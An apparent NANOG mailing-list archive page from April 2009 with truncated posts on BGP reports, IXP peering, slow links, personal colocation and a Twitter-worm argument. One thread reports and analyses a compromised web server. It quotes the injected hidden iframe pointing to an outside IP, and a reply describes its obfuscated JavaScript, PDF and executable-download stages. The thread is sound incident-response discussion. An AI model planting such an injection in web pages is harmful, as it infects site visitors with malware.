BGP Update Report
Interval: 16-Mar-09 -to- 16-Apr-09 (32 days)
Observation Point: BGP Peering with AS131072
TOP 20 Unstable Origin AS
Rank ASNUpds % Upds/PfxAS-Name
1 - AS6389 336400 4.2% 77.1 -- BELLSOUTH-NET-BLK -
BellSouth.net Inc.
2 - AS2386
This report has been generated at Fri Apr 17 21:14:20 2009 AEST.
The report analyses the BGP Routing Table of AS2.0 router
and generates a report on aggregation potential within the table.
Check http://www.cidr-report.org for a current version of this report.
Recent Table History
Date
Hello NANOG,
I like would to know what are best practices for an internet exchange. I
have some concerns about the following;
Can the IXP members use RFC 1918 ip addresses for their peering?
Can the IXP members use private autonomous numbers for their peering?
Maybe the answer is obviuos, but I l
On Fri, Apr 17, 2009 at 10:11:30AM -0400, Sharlon R. Carty wrote:
> Hello NANOG,
>
> I like would to know what are best practices for an internet exchange. I
> have some concerns about the following;
> Can the IXP members use RFC 1918 ip addresses for their peering?
> Can the IXP members use priva
m...@sharloncarty.net (Sharlon R. Carty) wrote:
> I like would to know what are best practices for an internet exchange. I
> have some concerns about the following;
> Can the IXP members use RFC 1918 ip addresses for their peering?
No. Those IP addresses will at least appear on traceroutes; also,
> Hello NANOG,
>
> I like would to know what are best practices for an internet exchange. I
> have some concerns about the following;
> Can the IXP members use RFC 1918 ip addresses for their peering?
> Can the IXP members use private autonomous numbers for their peering?
>
> Maybe the answer is
Theorically it's doable.
But mostly No to your questions.
IXP means Internet eXchange Point.
So it is public Internet. Why do you want to use private IP address ?
Most RIR allocate /24 unit for IXP.
For troubleshooting purpose, it is better to use public IP address as it
is designed.
Unless you w
On 4/16/09 6:34 PM, "w...@loopfree.net" wrote:
> Due to the vagaries of telecom pricing, I've ended up with a 2.5gig
> wavelength service between two locations when what I really wanted was a
> gig-e or two.
>
> I'm really not sure if this is a "transparent" wave service or not...
> the carrier
This is an automated weekly mailing describing the state of the Internet
Routing Table as seen from APNIC's router in Japan.
Daily listings are sent to bgp-st...@lists.apnic.net
For historical data, please see http://thyme.apnic.net.
If you have any comments please contact Philip Smith .
Routing
> > I like would to know what are best practices for an
> internet exchange.
> > I have some concerns about the following; Can the IXP
> members use RFC
> > 1918 ip addresses for their peering?
>
> No. Those IP addresses will at least appear on traceroutes;
> also, it might not be such a good
> -Original Message-
> From: Kevin Hunt [mailto:kh...@huntbrothers.com]
> Sent: Friday, April 17, 2009 12:28 PM
> To: w...@loopfree.net; nanog@nanog.org
> Subject: Re: So I've got this 2.5gig wave, what do I do with it?
>
> I haven't used MRV but they look appealing, would love to hear oth
with the advent of vlan tags, the whole idea of CSMA for IXP networks is passe.
just put each pair of peers into their own private tagged vlan and let one of
them allocate a V4 /30 and a V6 /64 for it. as a bonus, this prevents third
party BGP (which nobody really liked which sometimes got turned
On Fri, 17 Apr 2009, Paul Vixie wrote:
> with the advent of vlan tags, the whole idea of CSMA for IXP networks is
passe.
> just put each pair of peers into their own private tagged vlan.
Uh, I'm not sure whether you're being sarcastic or not.
-Bill
On 17.04.2009 20:52 Paul Vixie wrote
> with the advent of vlan tags, the whole idea of CSMA for IXP networks is
> passe.
> just put each pair of peers into their own private tagged vlan and let one of
> them allocate a V4 /30 and a V6 /64 for it. as a bonus, this prevents third
> party BGP (whic
> -Original Message-
> From: Eric Van Tol [mailto:e...@atlantech.net]
> Sent: Friday, April 17, 2009 2:44 PM
> To: nanog@nanog.org
> Subject: RE: So I've got this 2.5gig wave, what do I do with it?
>
> > -Original Message-
> > From: Kevin Hunt [mailto:kh...@huntbrothers.com]
> > Se
On Apr 17, 2009, at 12:00 PM, Arnold Nipper wrote:
On 17.04.2009 20:52 Paul Vixie wrote
with the advent of vlan tags, the whole idea of CSMA for IXP
networks is passe.
just put each pair of peers into their own private tagged vlan and
let one of
them allocate a V4 /30 and a V6 /64 for it.
On 17.04.2009 21:04 kris foster wrote
> On Apr 17, 2009, at 12:00 PM, Arnold Nipper wrote:
>
>> On 17.04.2009 20:52 Paul Vixie wrote
>>
>>> with the advent of vlan tags, the whole idea of CSMA for IXP
>>> networks is passe.
>>> just put each pair of peers into their own private tagged vlan and
Sorry, hit "send" a little early, by accident.
On Apr 17, 2009, at 11:52 AM, Paul Vixie wrote:
with the advent of vlan tags, the whole idea of CSMA for IXP
networks is passe.
just put each pair of peers into their own private tagged vlan.
I'm not sure whether you're being sarcastic, and if
On Fri, 17 Apr 2009, Arnold Nipper wrote:
Large IXP have >300 customers. You would need up to 45k vlan tags,
wouldn't you?
... and exchanging multicast would be... err.. suboptimal.
--
Mikael Abrahamssonemail: swm...@swm.pp.se
On Apr 17, 2009, at 12:05 PM, Arnold Nipper wrote:
On 17.04.2009 21:04 kris foster wrote
On Apr 17, 2009, at 12:00 PM, Arnold Nipper wrote:
On 17.04.2009 20:52 Paul Vixie wrote
with the advent of vlan tags, the whole idea of CSMA for IXP
networks is passe.
just put each pair of peers into
the vlan tagging idea is a virtualization of the PNI construct.
why use an IX when running 10's/100's/1000's of private network
interconnects will do?
granted, if out of the 120 ASN's at an IX, 100 are exchanging on
average - 80KBs - then its likley safe to dump them all into a single
physical
We just discovered what we suspect is malicious code appended to all index.html
files on our web server as of the 11:00 central time hour today:
src="http://77.92.158.122/webmail/inc/web/index.php";
style="display: none;" height="0" width="0">
http://77.92.158.122/webmail/inc/web/index.php";
st
FWIW, 77.92.158.122 resolves to mail.yarisfest.com, not mail.yaris.com
-Original Message-
From: Russell Berg
Sent: Friday, April 17, 2009 3:39 PM
To: 'nanog@nanog.org'
Subject: Malicious code just found on web server
We just discovered what we suspect is malicious code appended to all in
> Large IXP have >300 customers. You would need up to 45k vlan tags,
> wouldn't you?
the 300-peer IXP's i've been associated with weren't quite full mesh
in terms of who actually wanted to peer with whom, so, no.
On Fri, Apr 17, 2009 at 09:00:53PM +0200, Arnold Nipper wrote:
> Large IXP have >300 customers. You would need up to 45k vlan tags,
> wouldn't you?
Not only that, but when faced with the requirement of making the vlan
IDs match on both sides of the exchange, most members running layer 3
switches
Dear Group member,
We are level one ISP. one of my customer is connected to fast ethernet.
His link speed 100,000 kbps. while downloading any thing from net he
downloading speed donot go above 200 kbps.
While doing multiple download he get aroung 200 kbps in every window. But
when he close all the
link speed duplex mismatch ?
---
Nuno Vieira
nfsi telecom, lda.
nuno.vie...@nfsi.pt
Tel. (+351) 21 949 2300 - Fax (+351) 21 949 2301
http://www.nfsi.pt/
- "chandrashakher pawar" wrote:
> Dear Group member,
>
> We are level one ISP. one of my customer is connected to fast
> ethernet.
> H
chandrashakher pawar wrote:
Dear Group member,
We are level one ISP. one of my customer is connected to fast ethernet.
His link speed 100,000 kbps. while downloading any thing from net he
downloading speed donot go above 200 kbps.
While doing multiple download he get aroung 200 kbps in every win
Bad cable?... What trouble shooting steps have been done?
--Original Message--
From: chandrashakher pawar
To: na...@merit.edu
Subject: downloading speed
Sent: Apr 17, 2009 5:23 PM
Dear Group member,
We are level one ISP. one of my customer is connected to fast ethernet.
His link speed 100
On Fri, 17 Apr 2009, bmann...@vacation.karoshi.com wrote:
the vlan tagging idea is a virtualization of the PNI construct.
why use an IX when running 10's/100's/1000's of private network
interconnects will do?
granted, if out of the 120 ASN's at an IX, 100 are exchanging on
average - 80KBs - th
> On Fri, 17 Apr 2009, bmann...@vacation.karoshi.com wrote:
> > the vlan tagging idea is a virtualization of the PNI construct.
> > why use an IX when running 10's/100's/1000's of private network
> > interconnects will do?
> >
> > granted, if out of the 120 ASN's at an IX, 100 are exchanging on
> >
> The construct also doesn't scale well for multicast traffic exchange if
> there's a significant number of multicast peers even though the traffic
> might be low for individual source ASNs. On the other hand, if the IXP
> doesn't use IGMP/MLD snooping capable switches, then I suppose it doesn't
>
--- learn.chan...@gmail.com wrote:
From: chandrashakher pawar
We are level one ISP. one of my customer is connected to fast ethernet.
His link speed 100,000 kbps. while downloading any thing from net he
downloading speed donot go above 200 kbps.
While doing multiple download he get aroung 200 k
On 17.04.2009 23:06 Paul Vixie wrote
>> Large IXP have >300 customers. You would need up to 45k vlan tags,
>> wouldn't you?
>
> the 300-peer IXP's i've been associated with weren't quite full mesh
> in terms of who actually wanted to peer with whom, so, no.
Much depends on your definition of "qu
On Fri, Apr 17, 2009 at 5:23 PM, chandrashakher pawar
wrote:
> our router is C12KPRP-K4P-M
>
> Please advise what could be the cause?
Could you perhaps paste the router configuration in your reply? If you
could execute a "wr t" or a "show run", that should provide sufficient
information for the p
> > the 300-peer IXP's i've been associated with weren't quite full mesh
> > in terms of who actually wanted to peer with whom, so, no.
>
> Much depends on your definition of "quite". Would 30% qualify?
30% would be an over-the-top success. has anybody ever run out of 1Q tags
in an IXP context?
--- sur...@mauigateway.com wrote:
--- learn.chan...@gmail.com wrote:
From: chandrashakher pawar
While doing multiple download he get aroung 200 kbps in every window. But
when he close all the windows no change in downloading speed is observed.
-
You
I took a quick look at the code... formatted it in a pastebin here:
http://pastebin.com/m7b50be54
That javascript writes this to the page (URL obscured):
document.write("");
The 1.2.3.4 in the URL is my public IP address (I changed that).
Below the javascript, it grabs a PDF:
That PDF is on th
On 18.04.2009 00:04 Paul Vixie wrote
>>> the 300-peer IXP's i've been associated with weren't quite full
>>> mesh in terms of who actually wanted to peer with whom, so, no.
>>
>> Much depends on your definition of "quite". Would 30% qualify?
>
> 30% would be an over-the-top success. has anybody
chandrashakher pawar wrote:
We are level one ISP. one of my customer is connected to fast ethernet.
His link speed 100,000 kbps. while downloading any thing from net he
downloading speed donot go above 200 kbps.
While doing multiple download he get aroung 200 kbps in every window. But
when he cl
On Fri, Apr 17, 2009 at 04:52:53PM -0500, Joe Greco wrote:
> > On Fri, 17 Apr 2009, bmann...@vacation.karoshi.com wrote:
> > > the vlan tagging idea is a virtualization of the PNI construct.
> > > why use an IX when running 10's/100's/1000's of private network
> > > interconnects will do?
> > >
> >
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills wrote:
> I took a quick look at the code... formatted it in a pastebin here:
> http://pastebin.com/m7b50be54
>
> That javascript writes this to the page (URL obscured):
> document.write(" src=\"hXXp://77.9
Configuration
sh run interface FastEthernet1/3/1
Building configuration...
Current configuration : 351 bytes
!
interface FastEthernet1/3/1
description CUST:xxx
bandwidth 10
ip address 116.0.85.13 255.255.255.252
no ip redirects
no ip directed-broadcast
loa
Have him do a traceroute from his PC or router to where he is trying to
download from. Where is it choking?
On Fri, Apr 17, 2009 at 3:21 PM, chandrashakher pawar <
learn.chan...@gmail.com> wrote:
> Configuration
>
> sh run interface FastEthernet1/3/1
> Building co
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson
wrote:
>
> On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills
> wrote:
>
>> I took a quick look at the code... formatted it in a pastebin here:
>> http://pastebin.com/m7b50be54
>>
>> That javascript writes th
You beat me to it.
-ChrisAM
On Fri, Apr 17, 2009 at 6:31 PM, Paul Ferguson wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson
> wrote:
>
>>
>> On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills
>> wrote:
>>
>>> I took a quick look at the code.
Nice, bad code is actually on all of the error (404) pages for the site as
well as some other php pages.
The code is actually a base64 obfuscation technique to hide the actual
attack code.
Once decode the code attempts multiple attacks to try and get the victim to
download an executable
hxxp://
Several windows in the same PC, doing file transfer in parallel, each
get the same speed as one.
The speed is peaking at some specific speed every single time, and the
several windows reach this peak.
I smell classic TCP window size bumping into (bandwidth x delay).
Have you tried with iper
Based on the screen shot he's getting, 1536 bps or 192KB. Also if he is
opening several windows but downloading from the same source it may be a
congestion control mechanism on the server or hosting provider side. What's
the utilization on the RT, DSLAM and BRAS, all factors to performance.
Bill
Is anyone still doing personal colo on the west coast? I'm looking for a
new home for my personal server on the west coast, and it seems like
the economy has taken out most of the old personal colo offers.
Even the old web page on www.vix.com/personalcolo is gone.
On Fri, Apr 17, 2009 at 06:50:42PM -0400, Sean Donelan wrote:A
>
> Is anyone still doing personal colo on the west coast? I'm looking for a
> new home for my personal server on the west coast, and it seems like
> the economy has taken out most of the old personal colo offers.
> Even the old web
>> with the advent of vlan tags, the whole idea of CSMA for IXP networks
>> is passe. just put each pair of peers into their own private tagged
>> vlan and let one of them allocate a V4 /30 and a V6 /64 for it. as a
>> bonus, this prevents third party BGP (which nobody really liked which
>> somet
On Fri, Apr 17, 2009 at 04:10:32PM -0500, Richard A Steenbergen wrote:
> A far better way to implement this is with a web portal brokered virtual
> crossconnect system, which provisions MPLS martini pwe or vpls circuits
> between members.
A couple of years ago I thought of the same, and discovered
Here is place for good rates and a good colo facility -
http://unixmechanix.com/
And Nathan's personal blog - http://mybrainhurts.com/blog/
Eddy
On Apr 17, 2009, at 4:05 PM, Eddy Martinez wrote:
Hi Sean,
I saw your request on the Nanog list.
I use and know Nathan in San diego -
Nathan Hub
On 4/17/09 4:50 PM, Sean Donelan wrote:
Is anyone still doing personal colo on the west coast? I'm looking for a
new home for my personal server on the west coast, and it seems like
the economy has taken out most of the old personal colo offers. Even the
old web page on www.vix.com/personalcolo
chandrashakher pawar wrote:
No errors on the interface.
none of our customer on this router has complait us this issue
i have changed this to "negotiation auto" as suggested by one of our member.
tommorow customer will test again and reply.
round-trip-time is good, no bacbone chocked.
Unit will
Arnold Nipper writes:
> On 18.04.2009 00:04 Paul Vixie wrote
>
>> ... has anybody ever run out of 1Q tags in an IXP context?
>
> Why? You only need 1 ;-)
really? 1? at PAIX we started with three, two unicast (wrongheadedness)
and one multicast, then added another unicast for V6. then came the
Duplex Mismatch looks to be the problem.
On Fri, Apr 17, 2009 at 3:23 PM, chandrashakher pawar <
learn.chan...@gmail.com> wrote:
> Dear Group member,
>
> We are level one ISP. one of my customer is connected to fast ethernet.
> His link speed 100,000 kbps. while downloading any thing from net he
i just restored http://www.vix.com/personalcolo/ from backup. last update
2007. i guess this calls for another round of "send me your updates, folks."
re:
Sean Donelan writes:
> Is anyone still doing personal colo on the west coast? I'm looking for a
> new home for my personal server on the
by n3td3v April 17, 2009 5:43 PM PDT
"The teenager who takes credit for the worms that hit Twitter earlier
this week has been hired by a Web application development firm and on
Friday released a fifth worm on the microblogging site, he said."
I hope the FBI nip him in the bud, this cannot contin
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills wrote:
>> I took a quick look at the code... formatted it in a pastebin here:
>> http://pastebin.com/m7b50be54
>>
>> That javascript writes this to the page (URL obscured):
>> document.write("> src=\"hXX
andrew.wallace wrote:
I want this individual made an example of and im not joking.
And I'd like an example made of companies that ignore reports of
security flaws and leave their customers open to such worms; not to
mention giving the impression to misguided teenagers that the only way
they
So if Al-Qaeda blow up a shopping centre and the guy who masterminded
it turns out to be 17 he gets a job in MI5?
OH MY GOD.
On Sat, Apr 18, 2009 at 2:28 AM, Jack Bates wrote:
> andrew.wallace wrote:
>>
>> I want this individual made an example of and im not joking.
>>
>
> And I'd like an exampl
And I want cnet to not report this crap.
They glamorise it.
--Original Message--
From: andrew.wallace
To: nanog@nanog.org
To: n3td3v
Subject: Re: Michael Mooney releases another worm: Law Enforcement /
Intelligence Agency's do nothing
Sent: Apr 17, 2009 18:38
So if Al-Qaeda blow up a sho
All i'm saying is "Cyber Security" needs to be taken as seriously as
"real life" security. Hopefully though the 60 day cyber security
review by Melissa Hathaway will shake things up.
Andrew
On Sat, Apr 18, 2009 at 2:49 AM, Chaim Rieger wrote:
> And I want cnet to not report this crap.
>
> They g
I get it now... Chaim Rieger = netdev
Nice trick.
--
Steve
On Sat, 18 Apr 2009, Chaim Rieger wrote:
And I want cnet to not report this crap.
They glamorise it.
--Original Message--
From: andrew.wallace
To: nanog@nanog.org
To: n3td3v
Subject: Re: Michael Mooney releases another worm: L
The network community and the security community need to collaborate
as much as possible to defeat the threats.
I'm British and i'm hoping to make UK as secure as possible.
We can only do this by pulling together and reporting intelligence
between community's, either if that's on an open list suc
Arnold Nipper wrote:
On 17.04.2009 20:52 Paul Vixie wrote
Large IXP have >300 customers. You would need up to 45k vlan tags,
wouldn't you?
Not agreeing or disagreeing with this as a concept, but I'd imagine that
since a number of vendors support arbitrary vlan rewrite on ports that
in
> Not agreeing or disagreeing with this as a concept, but I'd imagine
> that
> since a number of vendors support arbitrary vlan rewrite on ports that
> in simple environment you could do some evil things with that. (ie.
> you could use QinQ "like" ATM Virtual Paths between core switches and
> then
On 18/04/2009, at 12:08 PM, Paul Vixie wrote:
i should answer something said earlier: yes there's only 14 bits of
tag and
yes 2**14 is 4096. in the sparsest and most wasteful allocation
scheme,
tags would be assigned 7:7 so there'd be a max of 64 peers. it's more
likely that tags would be
> So if Al-Qaeda blow up a shopping centre and the guy who masterminded
> it turns out to be 17 he gets a job in MI5?
what is more fun than a net vigilante? a ranting and raving hyperbolic
net vigilante.
You are exactly right Randy.
fromRandy Bush
to Franck Martin
cc 74attend...@ietf.org
dateWed, Mar 18, 2009 at 4:47 PM
subject Re: [74attendees] IETF attendee from Italy or Hong Kong --
visa issue
> Yes Stockholm is first but as it seemed to be an issue with Asia
going
> Not sure how switches handle HOL blocking with QinQ traffic across trunks,
> but hey...
> what's the fun of running an IXP without testing some limits?
Indeed. Those with longer memories will remember that I used to
regularly apologize at NANOG meetings for the DEC Gigaswitch/FDDI
head-of-line b
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Elmar K. Bins wrote:
> I am not an IXP operator, but I know of no exchange (public or
> private, big or closet-style) that uses private ASNs or RFC1918
> space.
I know of at least two IXPs where RFC 1918 space is used on the IXP
Subnet. I know a fair
Pardon the ignorance
I have to take this a step back. Your neighbor leaves their window open with
a fresh bowl of fish near the window. A bunch of cats show up and start
trying to get in, to no avail do they get in. At the first chance you
discuss this with your neighbor, and warn them of this si
75 matches
Mail list logo
